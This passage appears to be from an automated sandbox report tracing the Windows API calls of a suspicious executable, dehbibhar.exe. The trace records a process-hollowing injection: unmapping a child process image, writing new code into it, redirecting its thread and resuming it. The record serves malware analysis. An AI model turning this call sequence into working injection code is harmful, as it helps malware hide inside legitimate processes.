[488]=0x1c, [489]=0xf4, [490]=0x19, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0xec, [505]=0xf8, [506]=0x19, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0308.919] ReadProcessMemory (in: hProcess=0x1e0, lpBaseAddress=0x234008, lpBuffer=0x19f424, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19f424*, lpNumberOfBytesRead=0x0) returned 1 [0308.920] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec98 | out: Wow64Process=0x19ec98*=1) returned 1 [0308.920] lstrlenW (lpString="dehbibhar.exe") returned 13 [0308.920] lstrlenW (lpString="ntdll.dll") returned 9 [0308.920] lstrlenW (lpString="ntdll.dll") returned 9 [0308.920] lstrlenW (lpString="ntdll.dll") returned 9 [0308.920] lstrlenW (lpString="ntdll.dll") returned 9 [0308.920] lstrlenW (lpString="tdll.dll") returned 8 [0308.920] lstrlenW (lpString="dll.dll") returned 7 [0308.920] lstrlenW (lpString="ll.dll") returned 6 [0308.921] lstrlenW (lpString="l.dll") returned 5 [0308.921] lstrlenW (lpString=".dll") returned 4 [0308.921] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0308.921] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0308.921] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000 [0308.921] ReadFile (in: hFile=0x1e8, lpBuffer=0x2200000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec68, lpOverlapped=0x0 | out: lpBuffer=0x2200000*, lpNumberOfBytesRead=0x19ec68*=0x1784a0, lpOverlapped=0x0) returned 1 [0309.048] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000 [0309.131] CloseHandle (hObject=0x1e8) returned 1 [0309.132] VirtualFree (lpAddress=0x2200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0309.237] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0309.254] NtUnmapViewOfSection (ProcessHandle=0x1e0, BaseAddress=0x400000) returned 0x0 [0309.301] VirtualAllocEx (hProcess=0x1e0, lpAddress=0x400000, dwSize=0xa2000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0309.352] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec68 | out: Wow64Process=0x19ec68*=1) returned 1 [0309.353] lstrlenW (lpString="dehbibhar.exe") returned 13 [0309.353] lstrlenW (lpString="ntdll.dll") returned 9 [0309.353] lstrlenW (lpString="ntdll.dll") returned 9 [0309.353] lstrlenW (lpString="ntdll.dll") returned 9 [0309.353] lstrlenW (lpString="ntdll.dll") returned 9 [0309.353] lstrlenW (lpString="tdll.dll") returned 8 [0309.353] lstrlenW (lpString="dll.dll") returned 7 [0309.353] lstrlenW (lpString="ll.dll") returned 6 [0309.353] lstrlenW (lpString="l.dll") returned 5 [0309.353] lstrlenW (lpString=".dll") returned 4 [0309.353] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0309.353] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0309.353] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000 [0309.354] ReadFile (in: hFile=0x1e8, lpBuffer=0x2200000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec38, lpOverlapped=0x0 | out: lpBuffer=0x2200000*, lpNumberOfBytesRead=0x19ec38*=0x1784a0, lpOverlapped=0x0) returned 1 [0309.472] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000 [0309.562] CloseHandle (hObject=0x1e8) returned 1 [0309.563] VirtualFree (lpAddress=0x2200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0309.585] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0309.691] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x400000, Buffer=0x510000*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x19ec9c | out: Buffer=0x510000*, NumberOfBytesWritten=0x19ec9c*=0x400) returned 0x0 [0309.891] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec68 | out: Wow64Process=0x19ec68*=1) returned 1 [0309.891] lstrlenW (lpString="dehbibhar.exe") returned 13 [0309.891] lstrlenW (lpString="ntdll.dll") returned 9 [0309.891] lstrlenW (lpString="ntdll.dll") returned 9 [0309.891] lstrlenW (lpString="ntdll.dll") returned 9 [0309.891] lstrlenW (lpString="ntdll.dll") returned 9 [0309.892] lstrlenW (lpString="tdll.dll") returned 8 [0309.892] lstrlenW (lpString="dll.dll") returned 7 [0309.892] lstrlenW (lpString="ll.dll") returned 6 [0309.892] lstrlenW (lpString="l.dll") returned 5 [0309.892] lstrlenW (lpString=".dll") returned 4 [0309.892] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0309.892] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0309.892] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000 [0309.892] ReadFile (in: hFile=0x1e8, lpBuffer=0x2200000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec38, lpOverlapped=0x0 | out: lpBuffer=0x2200000*, lpNumberOfBytesRead=0x19ec38*=0x1784a0, lpOverlapped=0x0) returned 1 [0309.914] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000 [0309.994] CloseHandle (hObject=0x1e8) returned 1 [0309.994] VirtualFree (lpAddress=0x2200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0310.018] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0310.065] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x401000, Buffer=0x510400*, NumberOfBytesToWrite=0x13800, NumberOfBytesWritten=0x19ec9c | out: Buffer=0x510400*, NumberOfBytesWritten=0x19ec9c*=0x13800) returned 0x0 [0310.121] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec68 | out: Wow64Process=0x19ec68*=1) returned 1 [0310.121] lstrlenW (lpString="dehbibhar.exe") returned 13 [0310.121] lstrlenW (lpString="ntdll.dll") returned 9 [0310.122] lstrlenW (lpString="ntdll.dll") returned 9 [0310.122] lstrlenW (lpString="ntdll.dll") returned 9 [0310.122] lstrlenW (lpString="ntdll.dll") returned 9 [0310.122] lstrlenW (lpString="tdll.dll") returned 8 [0310.122] lstrlenW (lpString="dll.dll") returned 7 [0310.122] lstrlenW (lpString="ll.dll") returned 6 [0310.122] lstrlenW (lpString="l.dll") returned 5 [0310.122] lstrlenW (lpString=".dll") returned 4 [0310.122] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0310.122] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0310.122] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000 [0310.123] ReadFile (in: hFile=0x1e8, lpBuffer=0x2200000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec38, lpOverlapped=0x0 | out: lpBuffer=0x2200000*, lpNumberOfBytesRead=0x19ec38*=0x1784a0, lpOverlapped=0x0) returned 1 [0310.165] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000 [0310.197] CloseHandle (hObject=0x1e8) returned 1 [0310.197] VirtualFree (lpAddress=0x2200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0310.228] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0310.250] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x415000, Buffer=0x523c00*, NumberOfBytesToWrite=0x4200, NumberOfBytesWritten=0x19ec9c | out: Buffer=0x523c00*, NumberOfBytesWritten=0x19ec9c*=0x4200) returned 0x0 [0310.289] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec68 | out: Wow64Process=0x19ec68*=1) returned 1 [0310.289] lstrlenW (lpString="dehbibhar.exe") returned 13 [0310.289] lstrlenW (lpString="ntdll.dll") returned 9 [0310.289] lstrlenW (lpString="ntdll.dll") returned 9 [0310.289] lstrlenW (lpString="ntdll.dll") returned 9 [0310.289] lstrlenW (lpString="ntdll.dll") returned 9 [0310.289] lstrlenW (lpString="tdll.dll") returned 8 [0310.289] lstrlenW (lpString="dll.dll") returned 7 [0310.289] lstrlenW (lpString="ll.dll") returned 6 [0310.289] lstrlenW (lpString="l.dll") returned 5 [0310.289] lstrlenW (lpString=".dll") returned 4 [0310.289] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0310.290] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0310.290] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000 [0310.290] ReadFile (in: hFile=0x1e8, lpBuffer=0x2200000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec38, lpOverlapped=0x0 | out: lpBuffer=0x2200000*, lpNumberOfBytesRead=0x19ec38*=0x1784a0, lpOverlapped=0x0) returned 1 [0310.317] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000 [0310.350] CloseHandle (hObject=0x1e8) returned 1 [0310.351] VirtualFree (lpAddress=0x2200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0310.370] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0310.392] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x41a000, Buffer=0x527e00*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x19ec9c | out: Buffer=0x527e00*, NumberOfBytesWritten=0x19ec9c*=0x200) returned 0x0 [0310.470] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec68 | out: Wow64Process=0x19ec68*=1) returned 1 [0310.470] lstrlenW (lpString="dehbibhar.exe") returned 13 [0310.470] lstrlenW (lpString="ntdll.dll") returned 9 [0310.470] lstrlenW (lpString="ntdll.dll") returned 9 [0310.470] lstrlenW (lpString="ntdll.dll") returned 9 [0310.470] lstrlenW (lpString="ntdll.dll") returned 9 [0310.470] lstrlenW (lpString="tdll.dll") returned 8 [0310.470] lstrlenW (lpString="dll.dll") returned 7 [0310.470] lstrlenW (lpString="ll.dll") returned 6 [0310.470] lstrlenW (lpString="l.dll") returned 5 [0310.470] lstrlenW (lpString=".dll") returned 4 [0310.470] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0310.533] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0310.533] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000 [0310.534] ReadFile (in: hFile=0x1e8, lpBuffer=0x2200000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec38, lpOverlapped=0x0 | out: lpBuffer=0x2200000*, lpNumberOfBytesRead=0x19ec38*=0x1784a0, lpOverlapped=0x0) returned 1 [0310.665] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000 [0310.804] CloseHandle (hObject=0x1e8) returned 1 [0310.804] VirtualFree (lpAddress=0x2200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0310.877] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0310.894] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x4a0000, Buffer=0x528000*, NumberOfBytesToWrite=0x2000, NumberOfBytesWritten=0x19ec9c | out: Buffer=0x528000*, NumberOfBytesWritten=0x19ec9c*=0x2000) returned 0x0 [0310.966] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec68 | out: Wow64Process=0x19ec68*=1) returned 1 [0310.966] lstrlenW (lpString="dehbibhar.exe") returned 13 [0310.966] lstrlenW (lpString="ntdll.dll") returned 9 [0310.966] lstrlenW (lpString="ntdll.dll") returned 9 [0310.966] lstrlenW (lpString="ntdll.dll") returned 9 [0310.966] lstrlenW (lpString="ntdll.dll") returned 9 [0310.967] lstrlenW (lpString="tdll.dll") returned 8 [0310.967] lstrlenW (lpString="dll.dll") returned 7 [0310.967] lstrlenW (lpString="ll.dll") returned 6 [0310.967] lstrlenW (lpString="l.dll") returned 5 [0310.967] lstrlenW (lpString=".dll") returned 4 [0310.967] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0310.967] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0310.967] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000 [0310.967] ReadFile (in: hFile=0x1e8, lpBuffer=0x2200000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec38, lpOverlapped=0x0 | out: lpBuffer=0x2200000*, lpNumberOfBytesRead=0x19ec38*=0x1784a0, lpOverlapped=0x0) returned 1 [0310.994] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000 [0311.083] CloseHandle (hObject=0x1e8) returned 1 [0311.083] VirtualFree (lpAddress=0x2200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.155] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.174] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x234008, Buffer=0x19f438*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19ec9c | out: Buffer=0x19f438*, NumberOfBytesWritten=0x19ec9c*=0x4) returned 0x0 [0311.187] SetThreadContext (hThread=0x1dc, lpContext=0x19f0e0*(ContextFlags=0x10007, Dr0=0x723764b0, Dr1=0x8267b6f6, Dr2=0xfffffffe, Dr3=0x0, Dr6=0x6e6430, Dr7=0x77868828, FloatSave.ControlWord=0x1, FloatSave.StatusWord=0x3000003, FloatSave.TagWord=0x6e3320, FloatSave.ErrorOffset=0x72375ee0, FloatSave.ErrorSelector=0x72360000, FloatSave.DataOffset=0xb70002b5, FloatSave.DataSelector=0x7786aaae, FloatSave.RegisterArea=([0]=0xe0, [1]=0x5e, [2]=0x37, [3]=0x72, [4]=0x0, [5]=0x0, [6]=0x36, [7]=0x72, [8]=0x1, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xcc, [13]=0xaa, [14]=0x86, [15]=0x77, [16]=0x6e, [17]=0x5d, [18]=0x5d, [19]=0x21, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x25, [29]=0x2, [30]=0x0, [31]=0xc0, [32]=0x0, [33]=0x0, [34]=0x6d, [35]=0x0, [36]=0xd0, [37]=0xb9, [38]=0x6e, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x36, [43]=0x72, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x1, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0xd0, [53]=0x7, [54]=0x2, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x2, [59]=0x0, [60]=0x1, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x90, [69]=0xa5, [70]=0x6d, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x60, [77]=0x21, [78]=0x6d, [79]=0x0), FloatSave.Cr0NpxState=0xf46857d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x234000, Edx=0x0, Ecx=0x0, Eax=0x4139de, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25, [5]=0x2, [6]=0x0, [7]=0xc0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xd0, [13]=0xf1, [14]=0x19, [15]=0x0, [16]=0x2b, [17]=0xba, [18]=0x86, [19]=0x77, [20]=0x58, [21]=0xf2, [22]=0x19, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x9, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x20, [37]=0xf2, [38]=0x19, [39]=0x0, [40]=0x33, [41]=0xb8, [42]=0x86, [43]=0x77, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x59, [49]=0xb8, [50]=0x86, [51]=0x77, [52]=0x2e, [53]=0x5e, [54]=0x5d, [55]=0x21, [56]=0x98, [57]=0xf3, [58]=0x19, [59]=0x0, [60]=0x28, [61]=0xf4, [62]=0x19, [63]=0x0, [64]=0x90, [65]=0xf3, [66]=0x19, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x1c, [73]=0xf2, [74]=0x19, [75]=0x0, [76]=0x58, [77]=0xf2, [78]=0x19, [79]=0x0, [80]=0x98, [81]=0xf3, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x18, [89]=0x48, [90]=0x6e, [91]=0x0, [92]=0xe0, [93]=0xf1, [94]=0x19, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0xcc, [101]=0xff, [102]=0x19, [103]=0x0, [104]=0x30, [105]=0xee, [106]=0x8a, [107]=0x77, [108]=0x26, [109]=0x8d, [110]=0xd6, [111]=0x56, [112]=0xfe, [113]=0xff, [114]=0xff, [115]=0xff, [116]=0x59, [117]=0xb8, [118]=0x86, [119]=0x77, [120]=0x9e, [121]=0x1, [122]=0x87, [123]=0x77, [124]=0x20, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x4, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x90, [141]=0xf3, [142]=0x19, [143]=0x0, [144]=0x54, [145]=0xf2, [146]=0x19, [147]=0x0, [148]=0x1, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x28, [153]=0xf4, [154]=0x19, [155]=0x0, [156]=0xc0, [157]=0x1, [158]=0x87, [159]=0x77, [160]=0xa, [161]=0x5e, [162]=0x5d, [163]=0x21, [164]=0x20, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x12, [173]=0x0, [174]=0x0, [175]=0x1, [176]=0x60, [177]=0xf2, [178]=0x19, [179]=0x0, [180]=0x6e, [181]=0x0, [182]=0x74, [183]=0x0, [184]=0x64, [185]=0x0, [186]=0x6c, [187]=0x0, [188]=0x6c, [189]=0x0, [190]=0x2e, [191]=0x0, [192]=0x64, [193]=0x0, [194]=0x6c, [195]=0x0, [196]=0x6c, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa3, [205]=0x97, [206]=0x86, [207]=0x77, [208]=0xa6, [209]=0xad, [210]=0x8b, [211]=0x77, [212]=0x40, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x6c, [277]=0xf3, [278]=0x19, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x18, [287]=0x0, [288]=0xa4, [289]=0xfd, [290]=0x19, [291]=0x0, [292]=0xd4, [293]=0xf2, [294]=0x19, [295]=0x0, [296]=0x68, [297]=0xf3, [298]=0x19, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x73, [305]=0x0, [306]=0x65, [307]=0x0, [308]=0x2e, [309]=0x0, [310]=0x64, [311]=0x0, [312]=0x6c, [313]=0x0, [314]=0x6c, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x6e, [319]=0x0, [320]=0x70, [321]=0xf5, [322]=0x19, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x2, [327]=0x0, [328]=0x8, [329]=0xf3, [330]=0x19, [331]=0x0, [332]=0x8, [333]=0xf3, [334]=0x19, [335]=0x0, [336]=0x8, [337]=0xf3, [338]=0x19, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x2, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x1a, [353]=0x5f, [354]=0x5d, [355]=0x21, [356]=0x8c, [357]=0xf4, [358]=0x19, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xb5, [365]=0x93, [366]=0x86, [367]=0x77, [368]=0xb4, [369]=0xf3, [370]=0x19, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x2c, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x28, [381]=0xf9, [382]=0x19, [383]=0x0, [384]=0xa4, [385]=0xfd, [386]=0x19, [387]=0x0, [388]=0x30, [389]=0x94, [390]=0x86, [391]=0x77, [392]=0xa0, [393]=0xf5, [394]=0x19, [395]=0x0, [396]=0x20, [397]=0x0, [398]=0x0, [399]=0x1, [400]=0x16, [401]=0x0, [402]=0x18, [403]=0x0, [404]=0xa4, [405]=0xfd, [406]=0x19, [407]=0x0, [408]=0x48, [409]=0xf3, [410]=0x19, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x74, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0xec, [425]=0xf8, [426]=0x19, [427]=0x0, [428]=0x9c, [429]=0xb7, [430]=0x86, [431]=0x77, [432]=0x98, [433]=0xf3, [434]=0x19, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x42, [441]=0x5e, [442]=0x5d, [443]=0x21, [444]=0x1, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0xf0, [449]=0xf3, [450]=0x19, [451]=0x0, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xcd, [465]=0x35, [466]=0x87, [467]=0x77, [468]=0x68, [469]=0xbc, [470]=0x6e, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x9, [477]=0x36, [478]=0x87, [479]=0x77, [480]=0x1a, [481]=0x0, [482]=0x0, [483]=0x1a, [484]=0x60, [485]=0x21, [486]=0x6d, [487]=0x0, [488]=0x1c, [489]=0xf4, [490]=0x19, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0xec, [505]=0xf8, [506]=0x19, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0311.207] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec90 | out: Wow64Process=0x19ec90*=1) returned 1 [0311.207] lstrlenW (lpString="dehbibhar.exe") returned 13 [0311.207] lstrlenW (lpString="ntdll.dll") returned 9 [0311.207] lstrlenW (lpString="ntdll.dll") returned 9 [0311.207] lstrlenW (lpString="ntdll.dll") returned 9 [0311.207] lstrlenW (lpString="ntdll.dll") returned 9 [0311.207] lstrlenW (lpString="tdll.dll") returned 8 [0311.207] lstrlenW (lpString="dll.dll") returned 7 [0311.207] lstrlenW (lpString="ll.dll") returned 6 [0311.207] lstrlenW (lpString="l.dll") returned 5 [0311.207] lstrlenW (lpString=".dll") returned 4 [0311.207] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0311.207] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0311.207] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000 [0311.208] ReadFile (in: hFile=0x1e8, lpBuffer=0x2200000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec60, lpOverlapped=0x0 | out: lpBuffer=0x2200000*, lpNumberOfBytesRead=0x19ec60*=0x1784a0, lpOverlapped=0x0) returned 1 [0311.235] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000 [0311.270] CloseHandle (hObject=0x1e8) returned 1 [0311.270] VirtualFree (lpAddress=0x2200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.289] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.310] NtResumeThread (in: ThreadHandle=0x1dc, SuspendCount=0x19ecac | out: SuspendCount=0x19ecac*=0x1) returned 0x0 [0311.575] ExitProcess (uExitCode=0x0) Thread: id = 7 os_tid = 0x984 Thread: id = 8 os_tid = 0x410 Thread: id = 9 os_tid = 0xbf8 Process: id = "3" image_name = "dehbibhar.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe" page_root = "0x6ab0b000" os_pid = "0xb8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xfe0" cmd_line = 